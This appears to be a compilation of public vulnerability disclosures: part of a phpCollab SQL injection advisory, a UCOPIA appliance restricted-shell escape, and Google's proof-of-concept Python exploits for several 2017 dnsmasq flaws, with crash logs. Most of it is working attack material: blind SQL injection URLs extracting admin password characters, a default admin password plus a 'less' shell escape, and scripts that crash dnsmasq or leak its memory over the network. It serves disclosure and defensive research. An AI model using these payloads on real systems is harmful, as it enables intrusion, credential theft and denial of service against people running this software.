The following HTTP request allows an attacker to extract data using SQL injections in the `id` parameter (it requires at least one saved bookmark):
```
http://phpCollab.lan/bookmarks/deletebookmarks.php?action=delete&id=select+sleep(5)+from+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116)
```
### Vulnerable code
The vulnerable code is found in `bookmarks/deletebookmarks.php`, line 32.
```
if ($action == "delete") {
$id = str_replace("**",",",$id);
$tmpquery1 = "DELETE FROM ".$tableCollab["bookmarks"]." WHERE id IN($id)";
connectSql("$tmpquery1");
```
## Proof of Concept 3
The following HTTP request allows an attacker to extract some information using SQL injection in the `id` parameter (it requires at least one calendar entry):
```
http://phpCollab.lan/calendar/deletecalendar.php?project=&action=delete&id=select+sleep(5)+from+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116)
```
### Vulnerable code
The vulnerable code is found in `calendar/deletecalendar.php`, line 31.
```
if ($action == "delete") {
$id = str_replace("**",",",$id);
$tmpquery1 = "DELETE FROM ".$tableCollab["calendar"]." WHERE id IN($id)";
connectSql("$tmpquery1");
```
**Notes**
The application probably needs a security posture against injections, so other parameters and pages may be vulnerables. This advisory does not intend to be an exhaustive list of vulnerable parameters.
## Solution
Update to the latest version avalaible.
## Affected versions
* Version <= 2.5.1
## Timeline (dd/mm/yyyy)
* 27/08/2016 : Initial discovery.
* 05/10/2016 : Initial contact.
* 11/10/2016 : GPG Key exchange.
* 19/10/2016 : Advisory sent to vendor.
* 13/02/2017 : First fixes.
* 15/02/2017 : Fixes validation by Sysdream.
* 21/02/2017 : PhpCollab ask to wait before publish.
* 21/06/2017 : New version has been released.
* 29/09/2017 : Public disclosure.
## Credits
* Nicolas SERRA, Sysdream (n.serra -at- sysdream -dot- com)
--
SYSDREAM Labs <labs@sysdream.com>
GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1
* Website: https://sysdream.com/
* Twitter: @sysdream
# [CVE-2017-11321] UCOPIA Wireless Appliance < 5.1.8 Restricted Shell Escape
## Asset Description
UCOPIA solutions bring together a combination of software, appliance and cloud services serving small to large customers.
More than 12,000 UCOPIA solutions are deployed and maintained by UCOPIA expert partners all over the world.
The affected asset in this report is a WiFi management appliance.
## Vulnerability
Shell Escape via `less` command.
**Threat**
Improper sanitization of system commands in the restricted shell interface in UCOPIA Wireless Appliance, prior to 5.1.8, allows remote attackers to gain access to a system shell as the "admin" user.
**CVE ID**: CVE-2017-11321
**Access Vector**: network
**Security Risk**: critical
**Vulnerability**: CWE-78
**CVSS Base Score**: 9.1 (Critical)
**CVSS Vector**: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
### Proof of Concept: Restricted Shell Escape
By default, the UCOPIA wireless appliances exposes two shell access on port 22 (SSH) and 222 (ShellInTheBox).
A documented **admin** user exists on the system with the password **bhu85tgb**.
Quoted from the documentation :
> You can also retrieve the IP address of the outgoing interface. For this, you need to log in to the terminal of the virtual machine with
the following username and password: admin/bhu85tgb, and then execute the interface command.
By logging in within these interfaces, we can access to a restricted shell (*clish*) that allows only a few commands.
However, the `less` command is allowed, and because `less` allows to execute shell commands when viewing a file, we can use it to escape the restricted shell.
Steps :
**1/** Login to the appliance using SSH or ShellInTheBox.
**2/** Run the `less /etc/passwd` command.
**3/** When viewing the file, type `!sh`
**4/** You now have unrestricted `admin` user access to the appliance.
```
> less /etc/passwd
!sh
$ ls /
bin dev etc home lib proc tmp user
$ whoami
admin
```
## Solution
Update to UCOPIA 5.1.8
## Timeline (dd/mm/yyyy)
* 08/03/2017 : Vulnerability discovery.
* 03/05/2017 : Initial contact.
* 10/05/2017 : GPG Key exchange.
* 10/05/2017 : Advisory sent to vendor.
* 17/05/2017 : Request for feedback.
* 22/05/2017 : Vendor acknowledge the vulnerabilities.
* 21/06/2017 : Sysdream Labs request for an ETA, warning for public disclosure.
* 21/06/2017 : Vendor say that the UCOPIA 5.1.8 fixes the issue.
* 29/09/2017 : Public disclosure.
## Credits
* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)
--
SYSDREAM Labs <labs@sysdream.com>
GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1
* Website: https://sysdream.com/
* Twitter: @sysdream
'''
Sources:
https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14495.py
https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html
dnsmasq is vulnerable only if one of the following option is specified: --add-mac, --add-cpe-id or --add-subnet.
'''
#!/usr/bin/python
#
# Copyright 2017 Google Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# Fermin J. Serna <fjserna@google.com>
# Felix Wilhelm <fwilhelm@google.com>
# Gabriel Campana <gbrl@google.com>
# Kevin Hamacher <hamacher@google.com>
# Gynvael Coldwin <gynvael@google.com>
# Ron Bowes - Xoogler :/
import socket
import sys
def oom():
data = '''01 0d 08 1b 00 01 00 00 00 00 00 02 00 00 29 04
00 00 29 00 00 00 03 00 00 01 13 00 08 01 13 79
00 00 00 00 00
'''.replace(' ', '').replace('\n', '').decode('hex')
data = data.replace('\x00\x01\x13\x00', '\x7f\x00\x00\x01')
return data
if __name__ == '__main__':
if len(sys.argv) != 3:
print 'Usage: %s <ip> <port>' % sys.argv[0]
sys.exit(0)
ip = sys.argv[1]
port = int(sys.argv[2])
packet = oom()
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET,socket.SO_BROADCAST, 1)
while True:
s.sendto(packet, (ip, port))
#break
s.close()
'''
Sources:
https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14493.py
https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html
1) Build the docker and open two terminals
docker build -t dnsmasq .
docker run --rm -t -i --name dnsmasq_test dnsmasq bash
docker cp poc.py dnsmasq_test:/poc.py
docker exec -it <container_id> bash
2) On one terminal start dnsmasq:
# /test/dnsmasq_noasn/src/dnsmasq --no-daemon --dhcp-range=fd00::2,fd00::ff
dnsmasq: started, version 2.78test2-8-ga3303e1 cachesize 150
dnsmasq: compile time options: IPv6 GNU-getopt no-DBus no-i18n no-IDN DHCP DHCPv6 no-Lua TFTP no-conntrack ipset auth no-DNSSEC loop-detect inotify
dnsmasq-dhcp: DHCPv6, IP range fd00::2 -- fd00::ff, lease time 1h
dnsmasq: reading /etc/resolv.conf
dnsmasq: using nameserver 8.8.8.8#53
dnsmasq: using nameserver 8.8.4.4#53
dnsmasq: read /etc/hosts - 7 addresses
3) On another terminal start the PoC:
# python /poc.py ::1 547
[+] sending 70 bytes to ::1:547
4) Dnsmasq will output the following: Segmentation fault (core dumped)
==33==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffcbef81470 at pc 0x0000004b5408 bp 0x7ffcbef81290 sp 0x7ffcbef80a40
WRITE of size 30 at 0x7ffcbef81470 thread T0
#0 0x4b5407 in __asan_memcpy (/test/dnsmasq/src/dnsmasq+0x4b5407)
#1 0x575d38 in dhcp6_maybe_relay /test/dnsmasq/src/rfc3315.c:211:7
#2 0x575378 in dhcp6_reply /test/dnsmasq/src/rfc3315.c:103:7
#3 0x571080 in dhcp6_packet /test/dnsmasq/src/dhcp6.c:233:14
#4 0x544a82 in main /test/dnsmasq/src/dnsmasq.c:1061:2
#5 0x7f93e5da62b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
#6 0x41cbe9 in _start (/test/dnsmasq/src/dnsmasq+0x41cbe9)
Address 0x7ffcbef81470 is located in stack of thread T0 at offset 208 in frame
#0 0x57507f in dhcp6_reply /test/dnsmasq/src/rfc3315.c:78
This frame has 1 object(s):
[32, 208) 'state' <== Memory access at offset 208 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow (/test/dnsmasq/src/dnsmasq+0x4b5407) in __asan_memcpy
Shadow bytes around the buggy address:
0x100017de8230: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100017de8240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100017de8250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100017de8260: f1 f1 f1 f1 00 00 f3 f3 00 00 00 00 00 00 00 00
0x100017de8270: 00 00 00 00 f1 f1 f1 f1 00 00 00 00 00 00 00 00
=>0x100017de8280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00[f3]f3
0x100017de8290: f3 f3 f3 f3 f3 f3 f3 f3 00 00 00 00 00 00 00 00
0x100017de82a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100017de82b0: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1
0x100017de82c0: 00 00 00 00 00 00 00 00 00 00 00 f2 f2 f2 f2 f2
0x100017de82d0: 00 00 00 00 00 00 00 f2 f2 f2 f2 f2 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==33==ABORTING
'''
#!/usr/bin/python
#
# Copyright 2017 Google Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# Fermin J. Serna <fjserna@google.com>
# Felix Wilhelm <fwilhelm@google.com>
# Gabriel Campana <gbrl@google.com>
# Kevin Hamacher <hamacher@google.com>
# Gynvael Coldwind <gynvael@google.com>
# Ron Bowes - Xoogler :/
from struct import pack
import sys
import socket
def send_packet(data, host, port):
print("[+] sending {} bytes to {}:{}".format(len(data), host, port))
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, len(data))
if s.sendto(data, (host, port)) != len(data):
print("[!] Could not send (full) payload")
s.close()
def u8(x):
return pack("B", x)
def u16(x):
return pack("!H", x)
def gen_option(option, data, length=None):
if length is None:
length = len(data)
return b"".join([
u16(option),
u16(length),
data
])
if __name__ == '__main__':
assert len(sys.argv) == 3, "{} <ip> <port>".format(sys.argv[0])
pkg = b"".join([
u8(12), # DHCP6RELAYFORW
u16(0x0313), u8(0x37), # transaction ID
b"_" * (34 - 4),
# Option 79 = OPTION6_CLIENT_MAC
# Moves argument into char[DHCP_CHADDR_MAX], DHCP_CHADDR_MAX = 16
gen_option(79, "A" * 74 + pack("<Q", 0x1337DEADBEEF)),
])
host, port = sys.argv[1:]
send_packet(pkg, host, int(port))
'''
Sources:
https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14492.py
https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html
1) Build the docker and open two terminals
docker build -t dnsmasq .
docker run --rm -t -i --name dnsmasq_test dnsmasq bash
docker cp poc.py dnsmasq_test:/poc.py
docker exec -it <container_id> bash
2) On one terminal start dnsmasq:
# /test/dnsmasq_noasn/src/dnsmasq --no-daemon --dhcp-range=fd00::2,fd00::ff --enable-ra
dnsmasq: started, version 2.78test2-8-ga3303e1 cachesize 150
dnsmasq: compile time options: IPv6 GNU-getopt no-DBus no-i18n no-IDN DHCP DHCPv6 no-Lua TFTP no-conntrack ipset auth no-DNSSEC loop-detect inotify
dnsmasq-dhcp: DHCPv6, IP range fd00::2 -- fd00::ff, lease time 1h
dnsmasq-dhcp: router advertisement on fd00::
dnsmasq-dhcp: IPv6 router advertisement enabled
dnsmasq: reading /etc/resolv.conf
dnsmasq: using nameserver 8.8.8.8#53
dnsmasq: using nameserver 8.8.4.4#53
dnsmasq: read /etc/hosts - 7 addresses
3) On another terminal start the PoC:
# python /poc.py ::1 547
[+] sending 2050 bytes to ::1
4) Dnsmasq will output the following: Segmentation fault (core dumped)
==556==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61900000ea81 at pc 0x00000049628a bp 0x7ffd60a28a20 sp 0x7ffd60a281d0
WRITE of size 4 at 0x61900000ea81 thread T0
#0 0x496289 in __interceptor_vsprintf (/test/dnsmasq/src/dnsmasq+0x496289)
#1 0x4964d2 in __interceptor_sprintf (/test/dnsmasq/src/dnsmasq+0x4964d2)
#2 0x519538 in print_mac /test/dnsmasq/src/util.c:593:12
#3 0x586e6a in icmp6_packet /test/dnsmasq/src/radv.c:201:4
#4 0x544af4 in main /test/dnsmasq/src/dnsmasq.c:1064:2
#5 0x7f0d52e312b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
#6 0x41cbe9 in _start (/test/dnsmasq/src/dnsmasq+0x41cbe9)
0x61900000ea81 is located 0 bytes to the right of 1025-byte region [0x61900000e680,0x61900000ea81)
allocated by thread T0 here:
#0 0x4cc700 in calloc (/test/dnsmasq/src/dnsmasq+0x4cc700)
#1 0x5181b5 in safe_malloc /test/dnsmasq/src/util.c:267:15
#2 0x51cb14 in read_opts /test/dnsmasq/src/option.c:4615:16
#3 0x541783 in main /test/dnsmasq/src/dnsmasq.c:89:3
#4 0x7f0d52e312b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
SUMMARY: AddressSanitizer: heap-buffer-overflow (/test/dnsmasq/src/dnsmasq+0x496289) in __interceptor_vsprintf
Shadow bytes around the buggy address:
0x0c327fff9d00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c327fff9d10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c327fff9d20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c327fff9d30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c327fff9d40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c327fff9d50:[01]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff9d60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff9d70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff9d80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff9d90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==556==ABORTING
'''
#!/usr/bin/env python
#
# Copyright 2017 Google Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# Fermin J. Serna <fjserna@google.com>
# Felix Wilhelm <fwilhelm@google.com>
# Gabriel Campana <gbrl@google.com>
# Kevin Hamacher <hamacher@google.com>
# Gynvael Coldwind <gynvael@google.com>
# Ron Bowes - Xoogler :/
from struct import pack
import socket
import sys
ND_ROUTER_SOLICIT = 133
ICMP6_OPT_SOURCE_MAC = 1
def u8(x):
return pack("B", x)
def send_packet(data, host):
print("[+] sending {} bytes to {}".format(len(data), host))
s = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_ICMPV6)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, len(data))
if s.sendto(data, (host, 0)) != len(data):
print("[!] Could not send (full) payload")
s.close()
if __name__ == '__main__':
assert len(sys.argv) == 2, "Run via {} <IPv6>".format(sys.argv[0])
host, = sys.argv[1:]
pkg = b"".join([
u8(ND_ROUTER_SOLICIT), # type
u8(0), # code
b"X" * 2, # checksum
b"\x00" * 4, # reserved
u8(ICMP6_OPT_SOURCE_MAC), # hey there, have our mac
u8(255), # Have 255 MACs!
b"A" * 255 * 8,
])
send_packet(pkg, host)
'''
Sources:
https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14494.py
https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html
Sadly, there are no easy docker setup instructions available.
Setup a simple network with dnsmasq as dhcpv6 server. Run any dhcpv6 client on the clients machine and obtain the network packets. Look for the server identifier inside the dhcpv6 packets. Then, run the poc on the client:
# python /poc.py <ipv6 addr> <server id, hexencoded>
The poc will create a response.bin file with 32k bytes worth of ram, beginning at the buffer + 38.
'''
#!/usr/bin/env python
#
# Copyright 2017 Google Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# Fermin J. Serna <fjserna@google.com>
# Felix Wilhelm <fwilhelm@google.com>
# Gabriel Campana <gbrl@google.com>
# Kevin Hamacher <hamacher@google.com>
# Gynvael Coldwind <gynvael@google.com>
# Ron Bowes - Xoogler :/
from binascii import unhexlify
from struct import pack
import socket
import sys
# num bytes to leak. < 0xFFFF, exact upper limit not tested.
N_BYTES = 0x8000
def send_packet(data, host, port):
print("[+] sending {} bytes to [{}]:{}".format(len(data), host, port))
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, len(data))
if s.sendto(data, (host, port)) != len(data):
print("[!] Could not send (full) payload")
s.close()
def u8(x):
return pack("B", x)
def u16(x):
return pack("!H", x)
def gen_option(option, data, length=None):
if length is None:
length = len(data)
return b"".join([
u16(option),
u16(length),
data
])
def inner_pkg(duid):
OPTION6_SERVER_ID = 2
return b"".join([
u8(5), # Type = DHCP6RENEW
u8(0), u16(1337), # ID
gen_option(OPTION6_SERVER_ID, duid),
gen_option(1, "", length=(N_BYTES - 8 - 18)) # Client ID
])
if __name__ == '__main__':
assert len(sys.argv) == 2, "{} <ip> <duid>".format(sys.argv[0])
# No automated way to obtain a duid, sorry. Not a programming contest after all.
host, duid = sys.argv[1:]
duid = unhexlify(duid)
assert len(duid) == 14
pkg = b"".join([
u8(12), # DHCP6RELAYFORW
'?',
# Client addr
'\xFD\x00',
'\x00\x00' * 6,
'\x00\x05',
'_' * (33 - 17), # Skip random data.
# Option 9 - OPTION6_RELAY_MSG
gen_option(9, inner_pkg(duid), length=N_BYTES),
])
# Setup receiving port
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, N_BYTES)
s.bind(('::', 547))
# Send request
send_packet(pkg, host, 547)
# Dump response
with open('response.bin', 'wb') as f:
f.write(s.recvfrom(N_BYTES)[0])